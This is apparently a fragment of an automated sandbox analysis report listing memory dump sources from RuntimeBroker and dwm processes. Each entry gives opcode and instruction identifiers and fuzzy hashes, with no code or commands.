                                                                      • Opcode Fuzzy Hash: e918f86a40548bd273ad7ed38a3cef16b5b6b21debaaffae29967ed1648dc29a
                                                                      • Instruction Fuzzy Hash: 2531E77190E64ACFEB45EB68C8559B97BF0FF5A300B0445FAD00DD71A2EA29A845C781
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 09452cc70fcc8c78ed7b3f35d7dd2478f1e50b5f3cc00c3197ac412111e49ff8
                                                                      • Instruction ID: cf7477953481380e2d0bcc3639b4bf47ed3df9045065cd76644dde8516330aa8
                                                                      • Opcode Fuzzy Hash: 09452cc70fcc8c78ed7b3f35d7dd2478f1e50b5f3cc00c3197ac412111e49ff8
                                                                      • Instruction Fuzzy Hash: 4F31F461B1AA995FE788F738845AA7977D2EF99350B1440FDE40EC32E3DD18AC85C280
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8baf2a67b53561c333accbd73c42aa71e8535151dd88a858c8662aa5e78696f6
                                                                      • Instruction ID: 5177b5de11325785a182f14b6d3c787100ee9c4dfa0c75bf367e5d6daca9d0f1
                                                                      • Opcode Fuzzy Hash: 8baf2a67b53561c333accbd73c42aa71e8535151dd88a858c8662aa5e78696f6
                                                                      • Instruction Fuzzy Hash: BB31D466A0E649DFE715AB68D8451EC7FA0EF82351F1585B7D00CC62E3D9382589C7C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 12d8a55218e22317042f2073ddb63b436d403c693663775453853a3c18edbe5d
                                                                      • Instruction ID: 0bdbe5ccc713a039df247792655be3cda88c2706a7f775fbe67400ddcf233353
                                                                      • Opcode Fuzzy Hash: 12d8a55218e22317042f2073ddb63b436d403c693663775453853a3c18edbe5d
                                                                      • Instruction Fuzzy Hash: 4C21DA51B1FB868FE684E36C88697B56AE1EF9A744F4441BED40CC31E3CC5928C94382
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cd4f23702225a6343ff54d1646f675867204086cc55967b60773324dc5b95489
                                                                      • Instruction ID: a701b335c9633e8fffa8be93ef07750a06e8b1cd1f156e5cd8aa7b2f1fe803cf
                                                                      • Opcode Fuzzy Hash: cd4f23702225a6343ff54d1646f675867204086cc55967b60773324dc5b95489
                                                                      • Instruction Fuzzy Hash: 3C21EB30D18569CFEB65DB08C454BA9B3E1FB59314F1085EAC40EE3291CA79AEC4CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2ebf27d9b8c2bddb23783a1e6f405a056f4fa2622865dd980cdf28dcfa7ce27f
                                                                      • Instruction ID: c306b72b7be54ba8e2b197199eed880950137f82dda53802c80e2249acc0d12c
                                                                      • Opcode Fuzzy Hash: 2ebf27d9b8c2bddb23783a1e6f405a056f4fa2622865dd980cdf28dcfa7ce27f
                                                                      • Instruction Fuzzy Hash: DF11A036A0E789DFE706DB68C8551AC7FB0EF43251F1584B7D048DB2A2D538568AC7C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6ae8878554dd1cd8181be162eb52a013301c54fc3bf6f5c049a0e052ed85ba1c
                                                                      • Instruction ID: 3089173145992eee1a7af038aa0226d79ca1da674978f822f29189d4fe11b4d2
                                                                      • Opcode Fuzzy Hash: 6ae8878554dd1cd8181be162eb52a013301c54fc3bf6f5c049a0e052ed85ba1c
                                                                      • Instruction Fuzzy Hash: 25118230D1E5098BEB54E718D8466B976D1FF56340F5041B9D84DD32E2ED286CC8C7C2
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8f6b424134137d6587840da6032d2c86eb255bdee191464d7a689d668315282a
                                                                      • Instruction ID: 11a590a174681ac3eea44667523e8970f4d37835ed70dcc31b1341a65cced8f7
                                                                      • Opcode Fuzzy Hash: 8f6b424134137d6587840da6032d2c86eb255bdee191464d7a689d668315282a
                                                                      • Instruction Fuzzy Hash: 4101CB32A0E788DFE70ADB68C8540A87FB0EF42250F0480B7D048DB2A2D5385A89C781
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9e7169293f19e7df325f4af45e249c862f5fa8bccd7cca672ef8b31adc6b1100
                                                                      • Instruction ID: 5ac0458d7093ce37c656ae7377ba6151b46a1aabc89cd76a794a13be113f5d20
                                                                      • Opcode Fuzzy Hash: 9e7169293f19e7df325f4af45e249c862f5fa8bccd7cca672ef8b31adc6b1100
                                                                      • Instruction Fuzzy Hash: 45018C7590E389DFE70ADB68C8541A9BFB0EF42350F1981E7D048DB2A2D5385A89C781
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab480000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                                                      • Instruction ID: ee650fc49c6a003e7efacc327835dd1d13448634b7f5a63c33c7bb8dba674e30
                                                                      • Opcode Fuzzy Hash: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                                                      • Instruction Fuzzy Hash: BBF0B420E0D90BCFF755EB68E8606B93294FF56380F018175D42DC31F6EE28E80982C4
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 265d6d975da1c370076de69c664e47577e1242a7cd9164a8edcc6ee0b99e1ca6
                                                                      • Instruction ID: eeafc1e56f36de83a091281aa2e99c09b7bfa6463249f1dfd222b7f83ceb12a6
                                                                      • Opcode Fuzzy Hash: 265d6d975da1c370076de69c664e47577e1242a7cd9164a8edcc6ee0b99e1ca6
                                                                      • Instruction Fuzzy Hash: C3E04F7194F7C08FC74B973888A88A07F60DF6721174A41EEC045CF6B3EA198C4AC752
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      • Opcode ID: 906a854626dc74c83dd7189e40aec860d618a4003808e0508426c040b632cd41
                                                                      • Instruction ID: c4a66ddf08b53fa0a81383682ee6730c9b94841a9b68fe8d8b89c9ab04022be3
                                                                      • Opcode Fuzzy Hash: 906a854626dc74c83dd7189e40aec860d618a4003808e0508426c040b632cd41
                                                                      • Instruction Fuzzy Hash: 38F0657190E7C48FCB1ADB7488698557FA0EF6720174A55EFC045CF1A7EA2D8889CB41
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 2b698a6ebc5b36a0d445107bf54530d868cbf990d09814e7e97f06061df9b199
                                                                      • Instruction ID: a008cd5dd3ea68c49a7a6f871d611836c25210d640683a261409664c36777008
                                                                      • Opcode Fuzzy Hash: 2b698a6ebc5b36a0d445107bf54530d868cbf990d09814e7e97f06061df9b199
                                                                      • Instruction Fuzzy Hash: 49E0926144E3C04FCB06AB348875C453FA0DE2721178A40DEC045CB0B3D21E9849C702
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 64eb5e5e4d750f7659160ff548d98ffe11805b61fd02f7141648fd94b7cb76c6
                                                                      • Instruction ID: 0f74f1312c94d4367b3f86b64d29c7bed787e989357995fffc0e05907a7b0718
                                                                      • Opcode Fuzzy Hash: 64eb5e5e4d750f7659160ff548d98ffe11805b61fd02f7141648fd94b7cb76c6
                                                                      • Instruction Fuzzy Hash: 2CE01A6144F7C08FCB4AEB7488698447FA0AE6721078A41EEC049CF1B7EA2E8889C701
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: e59e868506ee6fbd5b508b096e1e25ddf965de27926d9a3e97c95849bdfe97c5
                                                                      • Instruction ID: b6de03b5f97559c7f25ea08c8357f04626411faf07c42436bac23bd72c18a450
                                                                      • Opcode Fuzzy Hash: e59e868506ee6fbd5b508b096e1e25ddf965de27926d9a3e97c95849bdfe97c5
                                                                      • Instruction Fuzzy Hash: 65E01A7144F7C04FCB4AEB7488698447FB0AE6721078A40EEC049CF1B3E62E8849CB01
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2d91617efa4acf18c873551d43bfe66c18bf0da427748c87c0a7428e9bcc5e5c
                                                                      • Instruction ID: f6dc769d35c03c128c04efb1309d17ab92b5361dba283b4670dc0862a0e654d7
                                                                      • Opcode Fuzzy Hash: 2d91617efa4acf18c873551d43bfe66c18bf0da427748c87c0a7428e9bcc5e5c
                                                                      • Instruction Fuzzy Hash: E7811B22A1DA898FFA98EB28C4566B977D1FF56380F4485B9D40DC31D3DD18AC8AC3C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8cbe65a97567c115e1146222241288e30c5ef19554915f3a78f7edfbfb2451e3
                                                                      • Instruction ID: 998911367f09f49b53b758e15389222f43d458d5cc4ba2ade463c100577cf6f7
                                                                      • Opcode Fuzzy Hash: 8cbe65a97567c115e1146222241288e30c5ef19554915f3a78f7edfbfb2451e3
                                                                      • Instruction Fuzzy Hash: CB412C3264C9159FD714FB6CE4889F87BE0EF8632170544BBD08ACB163DA10AC8183C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5a5f5b088163197626dcffd0106e095313bdc8c3b359808f12b1308ed0b30cf2
                                                                      • Instruction ID: 6e7b444f3a12ca1c8cb57c66a504a0470386bd716978eb7035b5b0fe759ac43a
                                                                      • Opcode Fuzzy Hash: 5a5f5b088163197626dcffd0106e095313bdc8c3b359808f12b1308ed0b30cf2
                                                                      • Instruction Fuzzy Hash: B2413963A4E6966FE304B37CE05A9F87BD0EF86365B1444FBD04EC71A3CD08688182C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6ef42f1445ba622c3f18af121e7f91fbb84421da273428643fd048a0f2468c45
                                                                      • Instruction ID: 52df0bd09a6300106365a0062340c3ffb77f4d3b7c9bdfa4282347b0ccc6987c
                                                                      • Opcode Fuzzy Hash: 6ef42f1445ba622c3f18af121e7f91fbb84421da273428643fd048a0f2468c45
                                                                      • Instruction Fuzzy Hash: 6441D921B1D94A8FEA98FB2CC4566B972D2FF96350F4481B9E40DC32D7DD286C8987C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction ID: 713c8b5414808e1ca5e637a988efc28f32dc33321c35014708da64902c1609a9
                                                                      • Opcode Fuzzy Hash: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction Fuzzy Hash: 4721D53130D8184FE768EB0CE889DB973D1FB5A32170101BAE58EC7136E911EC9287C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7cdc3fa24eeb01ee09c68bcf985e2d98914877f888f9bd7f106ad46d7b4108a3
                                                                      • Instruction ID: bf9a726b742878e74c1f971f74936ea5530878494489669698e28a67498f9392
                                                                      • Opcode Fuzzy Hash: 7cdc3fa24eeb01ee09c68bcf985e2d98914877f888f9bd7f106ad46d7b4108a3
                                                                      • Instruction Fuzzy Hash: F7313862A0EA566FF358B77CE44A9F877D1EF85361B1444BED40FC32A3CC186C814284
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bf012382655208f6df62b8ac956eff58fda6dda096123efd03c5c768dff8aaf2
                                                                      • Instruction ID: 90ca1a75074b9404457577fcabe03802cd9585cad0f0560c73c709d7205833ed
                                                                      • Opcode Fuzzy Hash: bf012382655208f6df62b8ac956eff58fda6dda096123efd03c5c768dff8aaf2
                                                                      • Instruction Fuzzy Hash: 6A31E73190DA4A8FDB45EB78C8559F97FF0FF5B310B0445BAC00EC71A2DA28A455C781
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9ade0583faeae5ffc9cfc3f8778f473576955644ed04d73214a94b2c10a42e9f
                                                                      • Instruction ID: 51a8e9f5d6b7cfd0ed034a4f51f64ad8dd9b45f65467d09ad82abaab270dea35
                                                                      • Opcode Fuzzy Hash: 9ade0583faeae5ffc9cfc3f8778f473576955644ed04d73214a94b2c10a42e9f
                                                                      • Instruction Fuzzy Hash: 80312870A0AA955FE788F738C05DAB977D2EF9A354B1040BDE40EC32A3DD18AC518290
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4bb083615e438833682d76ae5d7086db558cf9ff8ce0a5baabdf8da7ec5a79f8
                                                                      • Instruction ID: 64056e63eaa9014ab7abd8c46bccc5d35144ae60fb9efe7ec9e3b88d24a3b9bf
                                                                      • Opcode Fuzzy Hash: 4bb083615e438833682d76ae5d7086db558cf9ff8ce0a5baabdf8da7ec5a79f8
                                                                      • Instruction Fuzzy Hash: DE312476A0D64ADFE301AB78D8042EC7FB0EF82351F1485B6D04DCA2D3D93829A987D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2e68d1ae53cb2a2a288b6a9de785bf617faa61b34ccdb2aa3e64286e65373a06
                                                                      • Instruction ID: 60cb5963f67e0dad770d0a9eaa6d255d038e2203a26e2c5c5c7bb571d749d8b0
                                                                      • Opcode Fuzzy Hash: 2e68d1ae53cb2a2a288b6a9de785bf617faa61b34ccdb2aa3e64286e65373a06
                                                                      • Instruction Fuzzy Hash: 8721CB51A0EB868FE688E77D88A96756A91FF57344F0441BAD40CC35E7CC5858898392
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 60328c0765cd3c0e75bf6114b16701fcc33fb652cd3c6816f28481a9b1aaea77
                                                                      • Instruction ID: db6e507213296219568c7cdc50d4b57892699783b4cf277b356391641eaac2c0
                                                                      • Opcode Fuzzy Hash: 60328c0765cd3c0e75bf6114b16701fcc33fb652cd3c6816f28481a9b1aaea77
                                                                      • Instruction Fuzzy Hash: 9521EB30D18969CFEB65DB04C454BE9B3E1FB59314F1485EAC40EE3291CA79AE88CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a20c2f16be8a5cf93c1741d7f0eecc350c1d05bc538523981da2460913dae605
                                                                      • Instruction ID: 239fc04a3d08b4a6a2dd6a6ab780083395807f37b6dc89078ff0fd2797dbc660
                                                                      • Opcode Fuzzy Hash: a20c2f16be8a5cf93c1741d7f0eecc350c1d05bc538523981da2460913dae605
                                                                      • Instruction Fuzzy Hash: B5117030D1E9098BEB54EB18D8466F976D1FF56340F1041B9D84FD32A2ED38686946C2
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d2bb3cf7ef24b03d8655264155837fbce6f2c0c7af57cb7afabf7b278c7a61a
                                                                      • Instruction ID: 958d5a679b9930a30a02119475dfa8c50176f44c802e02bc9f22e0f0c4c3c54e
                                                                      • Opcode Fuzzy Hash: 7d2bb3cf7ef24b03d8655264155837fbce6f2c0c7af57cb7afabf7b278c7a61a
                                                                      • Instruction Fuzzy Hash: 40119E35A0D689DFE7069B68C8401D97FB0EF83251F1485B7C489DB2A2E538266987D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8605c5cd2ed30e922d213fdc2c823533a094b43cd86ef09129ed663d9de93910
                                                                      • Instruction ID: 034a2b631499da161201492a205d8ecd21f19c34d31f12b54a448c79055f56c8
                                                                      • Opcode Fuzzy Hash: 8605c5cd2ed30e922d213fdc2c823533a094b43cd86ef09129ed663d9de93910
                                                                      • Instruction Fuzzy Hash: 1E11AC35A0D289DFE7029B68C4401D97FB0EF82250F1485B6C449CB2A2D63826698780
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ad5857418f803b61acc6e2da6c31959211e5dde0cadc5b271e9a3561c7aa7287
                                                                      • Instruction ID: 362b00be108e3da212128b5bf4222bc6b77c146f4163b3853cabbd2e03b6f199
                                                                      • Opcode Fuzzy Hash: ad5857418f803b61acc6e2da6c31959211e5dde0cadc5b271e9a3561c7aa7287
                                                                      • Instruction Fuzzy Hash: CB01E130A1950ACFEB54EB28D455AF872D1EF56340F1180B5D84FC72A3ED28A8694685
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0fb33bb0b3f17d59341ab15ad9c1b10f822d6eba7bcab151df063c23b6d1dc84
                                                                      • Instruction ID: dd3d352653893482c2165113a11650171e4042ff6dcd5e90ed65bf565dd30d71
                                                                      • Opcode Fuzzy Hash: 0fb33bb0b3f17d59341ab15ad9c1b10f822d6eba7bcab151df063c23b6d1dc84
                                                                      • Instruction Fuzzy Hash: 9B016935A0D389DFE706DB68C8441D9BFB0EF43340F1485F6C449DB2A2EA386A68C781
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d07b5b26c3a0c20170229a639b96947a79ab10b6de91b9e0bc2cb91a825951a1
                                                                      • Instruction ID: d205cd1d13fa8f7ca909effce5fe6d1af4686036fd923160bdf71b7e2847470a
                                                                      • Opcode Fuzzy Hash: d07b5b26c3a0c20170229a639b96947a79ab10b6de91b9e0bc2cb91a825951a1
                                                                      • Instruction Fuzzy Hash: 8301363091941DCBEB64EB14D8456F873A1FF56341F1080F9D84FD32A2DD386DE98A85
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                                                      • Instruction ID: 4c4eb48d6c3a926962e49cf5ba2bf4c679c258a3add28ef3d7d2fb2cee1dc529
